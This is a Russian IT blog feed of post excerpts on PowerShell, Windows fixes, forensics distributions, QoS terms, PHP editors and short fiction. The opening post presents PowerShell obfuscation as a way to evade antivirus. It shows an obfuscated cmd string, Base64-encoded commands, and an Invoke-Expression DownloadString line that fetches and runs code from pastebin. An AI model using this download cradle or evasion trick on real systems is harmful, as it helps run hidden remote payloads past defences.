Жесткая обфускация в PowerShell.

Всем привет.

Как то я писал про кодирование команд в коде Powershell с параметром –EncodedCommand. Оказалось что тема обфускации в последнее время набирает популярности. Особенно в связи с тем что вирусня использует Powershell по полной для транспорта своей полезной нагрузки или своего запуска. 

А благодаря обфускации скрипт PowerShell можно спрятать от многих антивирусов.

Взгляните на эту строку. Что вы здесь видите?

;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "

Думаю - ничего. А ведь это всего лишь обфусцированная команда netstat /ano. Сегодня мы попробуем разобраться, как привести команды на PowerShell к такому виду. 

PowerShell в пентесте

Начнем с самого PowerShell. Почему в пентесте он используется так часто? Ну, как минимум потому, что PowerShell представляет собой командную оболочку и просто для понимания скриптовый язык, который используется в последних версиях операционной системы Windows. К тому же большая часть команд выполняется в памяти, что может помочь избежать детекта анвирусным ПО. Если на машине включено удаленное управление, то можно получить доступ к системе через зашифрованный трафик. Существуют отличные инструменты и фреймворки для работы с PowerShell. Также PowerShell можно вызывать из других  файлов (.bat, .doc, .xls, .ppt, .hta, .exe, .dll) и скриптов. С помощью PowerShell можно загружать код из интернета или файла на ПК и выполнять его. Для этого используется специальный командлет Invoke-Expression. Вот примеры использования.

Invoke-Expression -Command 'C:\directory\script.ps1'

'C:\directory\script.ps1' | Invoke-Expression

Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://pastebn.com/raw/MKM5QLaP')

Можно также использовать кодировку Base64. Для начала необходимо закодировать команды в Base64.

[Convert]::ToBase64String( [System.Text.Encoding]::Unicode.GetBytes('Ваш код'))

Перед выполнением надо будет декодировать их с помощью -EncodeCommand.

powershell -e RwBlAQALQBQAHIAbwBjGUAcwBzAA==

powershell -enc RwBlAHALQBQAHIAbwBjAGUAcwBzAA==

powershell -EncodedCommand RwBAHQALQBAHIAbwBjAGUAcwBzAA==

Процесс обфускации PowerShell довольно простой, так как это скриптовый язык и работает со строками, а не с исполняемым двоичным кодом. Итак, рассмотрим некоторые методы обфускации PowerShell. Будем рассматривать все на примере данной команды:

Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/MKM5QLaP')

Для начала постораемся убрать System из строки System.Net.WebClient. На выполнение самой команды это никак не повлияет, так как нет никакой необходимости писать System в функциях .NET.

Invoke-Expression (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/MKM5QLaP')

Командлет Measure-Object.

Всем привет.

Нашел обсуждение любимого командлета в Powershell у одного автора. Они долго там спорили, но автор настаивает на своей преданности к Measure-Object. 

Командлет Measure-Object действительно интересный. С его помощью можно быстро подсчитать количество строк, символов и даже слов в файле.

Get-Content cccc.log | Measure-Object –Line
Get-Content cccc.log | Measure-Object –Character
Get-Content cccc.log | Measure-Object –Word

Lines Words Characters Property
----- ----- ---------- --------
    8                         
            307               
      25           

Это все можно зарядить и  в одну строку.

Get-Content 111.rtf | Measure-Object –Line –Word –Character
Get-Content cccc.log | Measure-Object –Line –Word –Character

Lines Words Characters Property
----- ----- ---------- --------
   10    15        323       
     8    25        307       

Тут же я вам показал что Measure-Object также весело обрабатывает  и файлы типа RTF. Но,  право, вывод его сомнителен. Точно также он покажет нечто и на файлы типа XLS или DOCX.

Успехов.

Ровно 50 тысяч.

Всем привет.

Недавно на блоге был эмоциональный релакс "Версия 0.99". Если он вам не зашел, то сегодня есть возможность попробовать другую версию. Прошу прощения, но чей оригинал сейчас уже не помню. Давно это было. Если это важно... Поехали.

Пакет лежал прямо у двери - картонная коробка, на которой от руки были написаны их инициалы: "Мистеру и мисс Д+М=Л". Внутри оказалась маленькая черного цвета клавиатура с единственной подписанной кнопкой "Enter", закрытой стеклянным колпачком. Марго попыталась снять колпачок, но он не поддавался. К днищу коробочки липкой лентой был прикреплен сложенный листок бумаги: "Мистер Симпсон зайдет к вам в 20:00". Марго перечитала записку, отложила ее в сторону и, улыбаясь, пошла на кухню готовить салат.

Звонок в дверь раздался ровно в восемь.

- Я открою!- крикнула Марго с кухни. Дин читал в гостиной.

В коридоре стоял невысокий мужчина.

- Мисс Л?- вежливо осведомился он.- Я мистер Симпсон. - Ах, да...- Марго с трудом подавила улыбку. Теперь она была уверена, что это рекламный трюк какого-нибудь банка. Каждую неделю она выгребала из почтового ящика десятки рекламных буклетов на тему "оформляйте депозиты, берите кредиты…". 

- Разрешите войти?- спросил мистер Симпсон.

- Я сейчас занята. Так что, извините, просто вынесу вам вашу...

- Вы не хотите узнать, что это?

Марго молча повернулась.

- Это может оказаться выгодным...

- В денежном отношении?- вызывающе спросила она.

Мистер Симпсон кивнул.

- Именно.

Марго нахмурилась.

- Что вы продаете?

- Я ничего не продаю,- ответил он.

Из гостиной вышел Дин.

- Какое-то недоразумение?

Мистер Симпсон представился.

- А-а, эта клава...-Дин кивнул в сторону гостиной и улыбнулся.- Зачем она нам вообще?

- Я постараюсь объяснить,- сказал мистер Симпсон.- Разрешите войти?

Дин взглянул на Марго.

- Как знаешь,-сказала она. Он заколебался.

- Ну что ж, заходите.

Они прошли в гостиную. Мистер Симпсон сел в кресло и вытащил из внутреннего кармана пиджака маленький запечатанный конверт.

- Внутри находится ключ к колпачку, закрывающему клавишу,-пояснил он и положил конверт на журнальный столик.-Клавиатура соединена с компьютером в нашем офисе.

- Зачем?- спросил Дин.

- Если вы нажмете ее,- сказал мистер Симпсон,- где-то в мире умрет незнакомый вам человек, и вы получите бонус - ровно 50 тысяч.

Марго уставилась на посетителя широко раскрытыми глазами. Тот улыбался.

- О чем вы говорите?-недоуменно, спросил Дин.

Мистер Симпсон был удивлен:

- Разве я не объяснил?

- Это что, шутка?

- При чем тут шутка?- Совершенно серьезное предложение...

- Кого вы представляете?- перебила Марго.

Мистер Симпсон смутился.

- Боюсь, что я не могу ответить на этот вопрос. Тем не менее заверяю вас, что наша организация весьма представительна в этом мире.

- По-моему, вам лучше уйти,- заявил Дин, поднимаясь.

Мистер Симпсон встал с кресла.

- Пожалуйста. - И захватите вашу штуку.

- А может, подумаете день-другой?

Дин взял коробку и конверт и вложил их в руки Мистера Симпсона. Потом вышел в прихожую и распахнул дверь.

- Я оставлю свою карточку.- Мистер Симпсон положил на столик возле двери визитную карточку и ушел. Дин порвал ее пополам и бросил на стол.

- Как по-твоему, что все это значит?- спросила с дивана Марго.

- Мне плевать.

Она попыталась улыбнуться, но не смогла.

- И ни капельки не любопытно?.. Потом Дин стал читать, а Марго вернулась на кухню и закончила мыть посуду.

- Почему ты отказываешься говорить об этом?-спросила Марго.

Не прекращая чистить зубы, Дин поднял глаза я посмотрел на ее отражение в зеркале ванной.

- Разве тебя это не интригует?

- Меня это оскорбляет,- сказал Дин.

- Я понимаю, но...- Марго продолжала накручивать волосы на бигуди,- но ведь и интригует?..

- Ты думаешь, это шутка?-спросила она уже в спальне.

- Если шутка, то дурная.

Марго села на кровать и сбросила тапочки.

- Может быть, это психологи проводят какие-то исследования.

Дин пожал плечами.

- Может быть.

- Ты не хотел бы узнать? Он покачал головой.

- Но почему?

- Потому что это аморально.

Марго забралась под одеяло. Дин выключил свет к наклонился поцеловать ее.

- Спокойной ночи...

Hybrid Analysis как бесплатный сервис проверки файлов.

Всем привет.

Многие знают что для того чтобы развеять свои сомнения касательно безопасности скачанного с интернета файла, всегда можно открыть сервис VirusTotal и проверить файл на предмет вредоносного кода более чем 50-ю антивирусными программами. Выданные VirusTotal результаты можно считать окончательными, если наличие зловреда в файле определили сразу несколько антивирусов, причем это должны быть хорошо зарекомендовавшие себя программы, поскольку ложное срабатывание малоизвестными инструментами тоже не редкость. С другой стороны, расхожее мнение антивирусов может расцениваться как своего рода недостаток сервиса, способный ввести пользователя в заблуждение. VirusTotal использует сигнатуры, то есть готовые антивирусные базы, анализ производится без какой-либо эвристики. Разумеется, это не делает сервис малополезным, но было бы неплохо иметь под рукой какой-нибудь альтернативный инструмент определения угроз, использующий дополнительные механизмы анализа. Ну что же, такие инструменты есть. 

Одним из них, но единственным, является Hybrid Analysis - бесплатный сервис для проверки файлов и веб-страниц на предмет заражения вредоносным кодом.

В отличие от VirusTotal, представляющего собой солянку антивирусов, Hybrid Analysis является скорее песочницей. Когда вы отправляйте на проверку в файл, сервис запускает его в изолированной среде VirtualBox или VMware, а затем смотрит, как он поведет себя в системе. На основании произведенных файлом изменений выдается заключение о его безопасности или вредоносности. 

Ошибка №16 запуска Photoshop.

Всем привет.

Сегодня мой Photoshop CSx не запускался выдавая сообщение "Ошибка 16".  Эта ошибка справедлива и для Adobe Illustrator. 

В сети говорят что ошибка стара как мир и лечится просто - нужно дать права на запись обычному пользователю в каталог SLCache. 

Расположение каталога SLCache в зависимости от версии Windows и Photoshop:

(Photoshop 32 бита)

Windows 32 бит — диск:\Program Files\Common Files\Adobe\SLCache

Windows 64 бит — диск:\Program Files (x86)\Common Files\Adobe\SLCache

(Photoshop 64 бита)

Windows 64 бит — диск:\Program Files (x64)\Common Files\Adobe\SLCache

Это я себе на память записал.

И все.

Разрешить Windows исправлять размытость в приложениях.

Всем привет.

Не всем пользователям глубокое разрешение (FullHD) современного монитора в тему.

В Windows 7 была опция изменения масштаба экрана от 100% до 150%. Часто это приводило к неожиданных потерям пунктов меню или строки состояния в формах приложений которые не тестировались с такими фокусами.

Но в Windows 10 начиная с версии ядра 1803 появилась помощь в этом вопросе. А именно, на закладке "Дисплей" теперь есть опция "Дополнительные параметры масштабирования". Она может быть полезна для пользователей которые терпеть не могут современные мониторы с их разрешением и выставляют масштаб отображения всех элементов на экране больше чем 100%. При этом, как следствие, теряется резкость отображение окон как классических приложений так  и прикладного софта.

Так вот, там можно указать  "Разрешить Windows исправлять размытость в приложениях".  Результат такого шага следует оценивать лично.

Более того, можно также задать пользовательский размер масштабирования вплоть до 500%. Честно, даже экспериментировать не решаюсь.

Я сам не сторонник такого масштабирования, могут быть сюрпризы. Предпочитаю изменять разрешение монитора либо... его физические размеры.)

Успехов.

Дьявол кроется в деталях.

Всем привет.

Бывает в жизни каждого творческого человека темная полоса. Или полоска. Будь то web-дизайнер, кодировщик или просто художник. Видимо это тот момент когда муза от него ушла и не спешит возвращаться. В такие моменты обычно рядом появляется другой персонаж. Ниже, как вариант, общение с одним из них. Смелее читатель...

- И зачем ты здесь?!

- Ха, испугался?

- Не дождешься, просто спросил.

- Так ты же в курсе, мы приходим всегда за своим..., но тебе волноваться рано, меня ты не интересуешь.

- Ух ты, это чего так? За что такая милость?

- Так ты никогда не каешься, и у Самого ничего не просишь. Ты как та нехристь. С тобой нам не интересно. Кто ты есть? В актив тебя не зачтешь... В пассиве не числишься. Скучновато как то.

- Хитро поешь... Уже принять чью-то сторону? Не вижу смысла!

- Ха ха,... многие вначале не видят.

- Вот после и решим.

- Ой ладно, после. Упссс, а я ведь могла зайти к близким тебе..., а?

- Только попробуй!

- Ой, ой,... как вы, люди, здесь предсказуемы. Так ты даже знаешь кого я сейчас имела ввиду?

- Не твое дело.

- Хм, дело может и не мое, а ты то сам не запутался? Ты ведь с Ним не общаешься, а тут вдруг беседа, да на пару страниц. Мое самолюбие уязвлено.

- Уже разнюхала. Переживешь!

- Само собой. Но у тебя же с Ним договор, будь он неладен. А так бы я тебя давно..., как это на твоем языке - перекрасила.

- Другого поищи. Сегодня цвет не твой!

- Уже нашла. Их пруд пруди. Но они в основном серые. Вот ты другое дело, твоя палитра богаче. Но вот куда ты ее мажешь...

- Куда хочу.

- Возможно, а кто это оценит?

- Уже не важно...

- Оооо, не криви душой, а то ведь заберу. Это важно было всегда, важно и сейчас. А хочешь я оценю?!

- Ты???

- Конечно. Легко, ты же видел сколько известных работ хвалят не Его, но меня. Дьявол кроется в деталях.

 

- Хм, а ты себя любишь.

- Мне что, если бы не вы. Чуть что не так, сразу зовут меня...

- Я тебя не звал.

- Да ладно, какая последняя идея с коллажем тебя посетила, а? Вот, ок, молчу молчу, но между нами...

- Между нами?!

- Ой, я его смутила..., скажу так - между мной и твоей, ммм, не очень светлой стороной мне нравится эта идея. Мне очень хочется увидеть результат! Извини, но нам тоже бывает скучно. Обещаю, ежели что, я тебе идею зачту, на потом. Дерзай!

- Больно надо, будет тебе.

- Хм, больно или нет, узнаем после. Ладно, у тебя время есть, а у меня его валом. Со своим главным цветом определишься позже. Много позже. Но мы обязательно еще встретимся. Твой цвет решит как я приду - к тебе или... за тобой. До встречи, мастер.

Дистрибутивы для Forensics анализа.

Всем привет.

В марте 2013-го я выложил в свободный доступ свое творение "Компьютерный инцидент – от теории к практике. CLI Forensic Toolkit." Разумеется за это время такая наука как форензика не утратила своей актуальности. Более того, ее применение стало еще шире. 

И вот я вычитывая очередной пост по этой теме решил восполнить пробел в моей книге. А именно пробел по софтверной лаборатории для специалиста по форензике. Потому как уже не всегда можно получить добро с очередным ЧП на "нам некогда, все носим и ставим по новой". Нужно все чаще разбираться кто же на самом деле напартачил - софт или человек, с умыслом или без.

Для анализа и сбора артефактов вам будет нужна специальная лаборатория. Мы будем акцентироваться только на программную составляющую экспертизы поэтому нам в качестве основы вполне хватит пула из нескольких виртуальных машин и специализированных дистрибутивов с необходимым софтом. Гипервизор 2-го уровня для виртуалки можно выбрать на свой вкус - это может быть бесплатный VirtualBox или VMware.

Можно предпочесть сборку Kali Linux, DEFT или Remnux. CAINE и Parrot OS тоже достойны внимания, не говоря уже о платных Encase и SMART Linux. А теперь чуть подробнее.

Kali Linux

Разработанный и финансируемый компанией Offensive Security Ltd., дистрибутив Kali Linux является одной из лучших и любимых операционных систем хакеров. Kali Linux - это дистрибутив Linux на базе Debian, предназначенный для расширенного тестирования безопасности и аудита уязвимостей. Он содержит несколько сотен инструментов, предназначенных для решения различных задач информационной безопасности, таких как тестирование на проникновение, исследование безопасности, компьютерная криминалистика. И да, это тот самый Linux который использовал Elliot в сериале «Mr. Robot».

Kali Linux - это проект с открытым исходным кодом, который можно установить на свой ПК. Тем не менее, общая концепция заключается в том, чтобы использовать систему как Live CD (USB), запускать всевозможные пробы, тесты и исследования сетевых целей. Он предназначен как для Windows, так и для Linux-ориентированных инструментов. Он также поддерживает установку беспроводного соединения, настройки MANA Evil Access Point, клавиатуру HID (такие как Teensy), а также Bad USB MITM.

Мониторинг обновлений клиента McAfee.

Всем привет.

Решался вопрос как можно оценить прошло ли последнее обновление у только что установленного клиента McAfee. Оказалось что есть небольшая разница в обновлении клиента на рабочей станции. 

Из консоли VirusScan на компьютере пользователя для задачи AutoUpdate легко можно просмотреть журнал ее выполнения. Нужные сведения окажутся в самом низу файла. Сам файл, обычно, лежит здесь

C:\ProgramData\McAfee\DesktopProtection\UpdateLog.txt

13.03.2018 7:49:48 NT AUTHORITY\СИСТЕМА Запуск задачи: AutoUpdate

13.03.2018 7:50:13 NT AUTHORITY\СИСТЕМА Checking update packages from repository ePO_MCFORZA.

13.03.2018 7:50:13 NT AUTHORITY\СИСТЕМА Initializing update...

13.03.2018 7:50:13 NT AUTHORITY\СИСТЕМА Downloading catalog.z.

13.03.2018 7:50:35 NT AUTHORITY\СИСТЕМА Verifying catalog.z.

13.03.2018 7:50:36 NT AUTHORITY\СИСТЕМА Extracting catalog.z.

13.03.2018 7:50:36 NT AUTHORITY\СИСТЕМА Loading update configuration from: catalog.xml

и т.д.

Ежели настраивать задачу обновления как управляемый UpdateClient то следует не забыть отключить AutoUpdate для клиента в McAfee ePO.

В этом случае так же просто глянуть на журнал выполнения этой задачи из консоли VirusScan не получится, нет соответствующего пункта меню. И сам журнал теперь называется по другому и находится здесь

C:\ProgramData\McAfee\Agent\logs\McScript.log

К сожалению он хоть и текстовый, но содержит информацию несколько в другом формате чем упомянутый UpdateLog.txt. Плюс, мне пока непонятна отметка времени по каждому событию которая часто повторяет одни и те же секунды.

2018-07-28 08:52:56I#844udp_client Creating udp global broadcasting publisher.

2018-07-28 08:52:56I#844udp_client Created udp global broadcasting publisher.

2018-07-28 08:52:56I#844udp_client No of items to publish from all nics 1

и т.д.

Успехов.

Что такое ToS, CoS, QoS и DSCP.

Всем привет.

При настройке полосы пропускания в Kerio Control надо указывать величину QoS DSCP. Т.е. языком оригинала  "QoS DSCP Value can be set by using traffic rules, but it can be set by other routers on the way, the client or/and the server". Неплохо бы уяснить разницу между этими терминами. Разберемся что нам знакомо, а что нет.

Для начала расшифруем аббревиатуры:

ToS - Type of Service, 

DSCP - Differenciated Services Code Point, 

CoS - Class of Service, 

QoS - Quality of Service.

При этом термин QoS объединяет первые три ToS, DSCP, CoS. QoS - Quality of Service (качество обслуживания) выражается в построении и обработке очереди пакетов с разным приоритетом по одному из алгоритмов DWRED (Distributed Weighted Random Early Detection), WFQ (weighted fair queueing), CAR(Committed Access Rate).

Аббревиатуры ToS и DSCP родственны - используются для обозначения специального байта данных стандартного заголовка IP-пакета. Этот байт несет информацию о приоритете трафика, который в бизнес-трафике обычно назначается для пакетов IP-телефонии (третий сетевой уровень L3). Поскольку этот один и тот же байт иногда интерпретируется по-разному (либо как ToS байт, либо как DS/DSCP байт), получается некоторая путаница, хотя смысл и принцип технологии приоритезации не меняется - пакеты, помеченные более высоким приоритетом, передаются быстрее (менее приоритетные становятся в очередь). Накладывание на пакеты битов приоритета еще называют "маркированием" трафика, и чтобы приоритезация действительно работала, на всем пути прохождения трафика биты приоритета должны быть проанализированы и обработаны на активном сетевом оборудовании (настраиваемые роутеры и коммутаторы). На рисунке показано расположение бит байта маркировки трафика (красным помечена наиболее важная, серым - неиспользуемая часть).

Когда используют терминологию ToS, то в контексте приоретизации имеют в виду 3 старшие бита P2..P0, кодирующие уровень приоритета от 0 (минимальный приоритет) до 7 (максимальный приоритет). Для IP-телефонии применяется уровень приоритета 5 (critical, ToS-байт равен 0xA0 или 10100000b), а для обычного трафика уровень 0 (routine, ToS-байт равен 0x00 или 00000000b). У Cisco есть для каждого уровня приоритета специальное имя (precedence critical, precedence flash и т. д., см. таблицу).

И никакого Photoshop-a.

Всем привет.

Снега за день намело, надо лопатой поработать). Поэтому сегодня блиц.

Хочу показать как еще можно оформить рабочий стол. Чтобы не было скучно. Разумеется если корпоративная политика вам не указывает иное. Вот так я себе делал лет пять назад. 

Слово даю, здесь нет никакого Photoshop-a! А вам слабо?

Успехов, и не скучайте.

Лучшие редакторы кода для PHP разработчиков, часть 2.

Всем привет.

Продолжим наш обзор редакторов кода для PHP разработчиков. В первой части обзора были Sublime Text и Atom. Сегодня затронем Rapid PHP, PHPStorm и CodeLobster.

Rapid PHP

Rapid PHP - признанный редактор PHP с расширенной функциональностью, это позволяет называть его легковесной IDE.

Включает весь набор компонентов для написания скриптов на PHP и JavaScript, а также для использования HTML и CSS.

Есть несколько полезных особенностей для того, чтобы облегчить старт программистам-новичкам, например, привычный пользовательский интерфейс, отсутствие лишних элементов управления и встроенный PHP-интерпретатор.

Сразу после запуска программы предлагается минималистичный пользовательский интерфейс, далее в процессе работы можно скрывать и показывать все открытые панели нажатием одной клавиши F4.

Модернизированный редактор с проверкой синтаксиса PHP, вставкой фрагментов, подсветкой вхождений и высокой производительностью при открытии больших файлов.

Есть удобная функция "Go to anything", позволяющая по нажатию Ctrl + G произвести быстрый поиск и перейти к любому участку кода или файлу в проекте.

Много полезных возможностей можно ещё добавить в редактор установив дополнительные плагины. Чтобы просмотреть список доступных расширений, выберите в главном меню опцию "Plugins" -> "Manage Plugins".

Работа с кодом: расширенные возможности по редактированию PHP файлов, в том числе интегрированная документация и подсказки по функциям.

Например, чтобы получить подсказку по параметрам функции, достаточно ввести её имя и нажать комбинацию клавиш Ctrl + Shift + Space.

Лучшие редакторы кода для PHP разработчиков, часть 1.

Всем привет.

Web-кодировщики проводят массу времени в своих редакторах и IDE, поэтому и к выбору программного обеспечения относятся чрезвычайно серьёзно.

Как минимум, среда программирования должна обеспечить проверку синтаксиса и коррекцию кода, автодополнение и автозавершение - всё то, что называется "code intelligence".

Следует принимать во внимание и целый комплекс используемых технологий - HTML, CSS, JavaScript, PHP, а так же распределённый характер любого WEB-приложения.

PHP - это серверный язык программирования и в большинстве случаев скрипты пишутся на одном компьютере, а выполняются на другом - в среде хостинговой операционной системы.

Серверная часть любого сайта также может включать огромное количество SQL-запросов и интенсивно взаимодействовать с базами данных.

Если вы решили выйти за пределы хобби-проектов и программировать профессионально, то критически важно, чтобы ваша программа, кроме продвинутых возможностей редактирования, поддерживала ещё и FTP протокол, понимала синтаксис SQL и предоставляла интерфейс для подключения к базам данных.

Давайте рассмотрим, как популярные редакторы кода и IDE реализуют такие важные для PHP разработчиков функции.

Сегодня будет первая часть обзора где померяем возможности знаменитого Sublime Text и Atom. Поехали.

Sublime Text

Sublime Text - этот редактор представляет отличный пример сбалансированной функциональности и скорости, наряду с нетребовательностью к ресурсам.

Последняя версия работает эффективно и быстро, так же уменьшилось количество используемой оперативной памяти. Работает на Windows, Linux и OS X, для Windows также есть портабельная версия. 

Шрифт для экономии тонера при печати.

Всем привет.

Не взирая на борьбу за экологию в наших офисах не стали меньше печатать. Печать, печать, всюду печать. У некоторых пользователей даже по несколько точек печати. И даже то что написано или распечатано опять же может быть отсканировано и... повторно распечатано. Безбумажный офис превратился  в далекую мечту.

Но ИТ специалисты пытаются включить экономию для пользователя: экономию или бумаги или тонера. 

Как можно экономить бумагу я писал вам давненько про печать брошюрой. Но тут есть моральный аспект - не все могут прочитать такой мелкий шрифт. И второе - не все руководители  привыкли читать что-либо даже с обратной стороны листа, не говоря уже о брошюре. Так что с бумагой пока не сложилось.)

Будем экономить тонер.

Не открою Америку когда скажу что многие модели принтеров имеют такую фичу как "Экономия тонера при печати". Во что это выливается? Я наблюдал два варианта. 

Первый это общее понижение контраста на весь лист. Иногда получалось совсем плохо, народ не знал про включенную экономию и потому пробовал еще раз и еще. И как тут было не вспомнить поговорку "Принтер экономящий свой тонер увеличивает расход вашей бумаги".)

Второй вариант это печать контурным шрифтом. Если таковой загружен в сам принтер. Как для меня это то что надо. По оценкам экспертов получается экономия тонера от 25% на лист. 

Разумеется большое значение имеет шрифт самого документа. Сделаю небольшое отступление на эту тему. 

Стабилизация видео без Youtube.

Всем привет.

По случаю захотел, как раньше, стабилизировать видео онлайн, прямо в сервисе Youtube.

Часто так делал - закачиваешь туда свой видеоролик, включаешь ему функцию "стабилизировать ваше видео" и через минут пять стягиваешь его домой в лучшем виде.

Но вчера я оказался в глубокой растерянности. Нет теперь такой функции в Youtube. Ни в аккаунте партнера, ни в простом. В сети пишут что якобы можно видео стабилизировать в Google Photo. Увы, там такой функции тоже не оказалось.

Видимо Youtube теперь больше обеспокоен сокрытием личной информации, потому как функция размытия лиц у него предлагается на каждом шагу:

Размыть лица

Если вы примените эту функцию, все лица в видео будут размыты.

Размыть области

С помощью этой функции вы можете размыть определенные области или объекты в видео.

Возможно, некоторые области или объекты останутся неразмытыми. Вы можете включить предварительный просмотр и обработать их вручную. Если результат всё равно вас не устроит, не открывайте доступ к видео другим пользователям.

Просто жуть). А что мы делаем?

GIMP и написание плагинов на Python.

Всем привет.

Собственно в свое время я изучал как пишутся плагины в Inkscape и Paint.NET. Логично что от них не отстает в этом плане и красавец GIMP.

GIMP - довольно мощный растровый графический редактор, обладающий рядом преимуществ, одним из которых является возможность расширять функциональность путём написания дополнений (plugin). 

В качестве языков, на которых можно писать дополнения, годятся Scheme и Python. Существует возможность писать дополнения и на других языках (Perl, Tcl/Tk и т.д.), но модули, которые реализуют эту возможность, плохо поддерживаются либо вовсе не работают со свежими версиями GIMP.

Избрав языком для написания дополнения Scheme, вы автоматически оказываетесь в выигрыше, так как не существует в мире такой сборки GIMP-а, в которую бы интерпретатор Scheme не входил, и написанное вами дополнение гарантировано будет работать на всех платформах «из коробки», однако, писать на Scheme - то ещё удовольствие. Scheme является диалектом LISP. Однако LISP имеет неприятные нестыковки кодирования - несоблюдение баланса скобок, непростой синтаксис, невозможность использовать свой графический интерфейс  и прочее.

Слава богу GIMP поддерживает другой язык - Python. На слуху и популярность у него еще та. Ваше знакомство можете начать отсюда. Весьма познавательно.

Успехов.

Версия 0.99.

Всем привет.

Иногда надо отвлечься. От всего. Или помечтать, пофантазировать. У меня это происходит по разному. Восемь лет назад это был легкий пересказ под названием "Зеленка". Сегодня очередной релакс под названием "Версия 0.99". Любители фантастики легко узнают оригинал Артура Порджеса. Но я уверен что и моя версия имеет право на жизнь. Прошу.

За панорамным окном офиса вдалеке, спокойно, по осеннему не торопясь, текла река разделяющая город на две половинки. Было что-то общее между этим красивым видом и комнатной пальмой под которой сидел Джейк Орни. 

Обстановка соответствует настроению ... - подумал он и вдруг почувствовал легкий зуммер исходящий с журнального столика перед собой. Он заглянул под старый журнал и увидел что в там лежит крохотный гаджет, похожий на беспроводную мышку. Разинув рот, Джейк уставился на дрожащую мышь, пораженный столь странным поведением обычного гаджета который обычно не издает таких звуков. 

Тут же на входе в релакс-зону появилась представительница клининговой службы, до того решительно настроенная, что даже не поздоровалась с Джейком. Джейк поспешно схватил мышку в руку. Клининг-мастер остановилась рядом, проворчала что-то дежурное, и легким движением руки сметнула все журналы со столика в свою корзину. Без намека на любые эмоции она также быстро удалилась в сторону лифта.

Джек остался под пальмой один.

- Повезло тебе! - подумал Джейк рассматривая гаджет, лежавший у него на ладони, и усмехнулся. - Неравные же у тебя были шансы!

Ошибка 1603 и MS Office 2016.

Всем привет.

Интересное дело - понадобилось другу переехать с MS Office 2010 на MS Office 2016. Оба честные. Ну что тут такого - скажете вы. Деинсталлируем штатно 2010-й, перегружаем ПК для надежности,  ставим штатно 2016-й. Все просто. И я так думал.

Но меня ждал сюрприз. Со стороны 2016-го.

Итак, деинсталлировал 2010-й. Перегрузился. Запускаю инсталляцию 2016-го, она весело начинается, но где-то на пол пути выбрасывает ошибку 1603 и откатывается в начало. В чем дело? Переходим в %Temp% смотрим журнал SetupExe(datetime).log, если их несколько то сортировать по времени создания. Ошибка с кодом 1603.

2018/11/10 15:00:48:991::[4104] Error: Failed to install product:  C:\MSOCache\All Users\{90160000-002A-0419-1000-0000000FF1CE}-C\Office64MUI.msi ErrorCode: 1603(0x643). 

В сети предлагается решение проверить есть ли раздел реестра 

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Office

и папка C:\Windows\System32\Tasks\Microsoft\Office.

И сделать так чтобы или оба они были, или обоих не было. Просто шикарно)). До чего мудреный инсталятор MS Office 2016-го, да.

Предпочтения Facebook.

Всем привет.

Я как то говорил про страшилки Facebook и как он все про нас с вами помнит.

Но оказалось что понять на первый взгляд ваши отношения, или предпочтения, с точки зрения самого Facebook можно в нем же. Например, вы открываете список друзей и... порядок их представления имеет значение. Facebook свято полагает что те кто вверху вам нужнее. 

Почему так? По разному - вы с ними чаще общаетесь, ставите больше лайков и комментируете их посты. Логично? Вполне. Если вы еще сюда добавите что вам "Нравится" определенная страница или "Отслеживать" то вообще без вариантов.)

Что еще? Особый интерес представляют Мероприятия. Там есть две опции "Интересует" и "Пойду". Не так важно что вы выбираете сами как важно то кого Facebook вам предлагает в попутчики на мероприятие чуть ниже из ваших друзей. Удивлены списком?) Да вот так вот могут быть похожие интересы. Попробуйте выбрать разнопрофильные ивенты и сравнить. Совсем не похоже? Значит вы чего то не знаете... Возможно про себя.

Увидимся.

Проверка целостности системных файлов Windows.

Всем привет.

Проверка целостности системных файлов Windows может понадобиться в том случае, если у вас есть основания полагать, что такие файлы были повреждены. Или же возникли подозрения о том, что какой-либо вирус мог изменить системные файлы операционной системы. Чем это сделать?

Первый способ.

Если у вас Windows то самое простое это использование команду sfc /scannow. Также имеется возможность проверить целостность конкретного системного файла, для этого можно использовать команду sfc /scanfile="путь_к_файлу".

Однако при использовании команды есть один нюанс: SFC не может исправить ошибки целостности для тех системных файлов, которые используются в настоящий момент времени. 

Т.е. залочены самой системой. Чтобы решить проблему, можно запустить SFC через командную строку в среде восстановления Windows.

Второй способ.

Утилита для развертывания и обслуживания образов Windows DISM.exe позволяет выявить и исправить те проблемы с теми поврежденными системными файлами, с которыми не справилась команда SFC. Также, имеет смысл использовать этот инструмент, если SFC не обнаруживает нарушений целостности файлов Windows 10, но у вас есть веские основания полагать, что такие нарушения имеются.

Для использования DISM.exe, запустите командную строку от имени администратора (через правый клик по кнопке «Пуск»). После чего можно использовать следующие команды:

dism /Online /Cleanup-Image /CheckHealth — для получения информации о состоянии и наличии повреждений компонентов Windows. При этом сама проверка не производится, а лишь проверяются ранее записанные значения.

Проверка в Dism Check Health:

dism /Online /Cleanup-Image /ScanHealth — проверка целостности и наличия повреждений хранилища компонентов. Может занять продолжительное время и «зависать» в процессе на 20 процентах.

Проверка целостности DISM в Windows 10:

dism /Online /Cleanup-Image /RestoreHealth — производит и проверку и автоматическое восстановление системных файлов Windows, также как и в предыдущем случае, занимает время и останавливается в процессе.

Средство просмотра фотографий в Windows 10.

Всем привет.

Кампания Microsoft в новых версиях Windows 10 скрыла от пользователей старое доброе "Средство Просмотра фотографий Windows", На смену которому пришло современное приложение, под названием «Фотографии» (Photos). Нельзя сказать что новое приложение не удобное, просто не всем нужно то что оно может.)

Несмотря на то что новое приложение «Фотографии» имеет богатый функционал в отличии от старого классического, но многие пользователи хотят вернуть «Средство Просмотра фотографий Windows». Главная причина банальна - в новом приложении отсутствует возможность листать фотографии в папке.

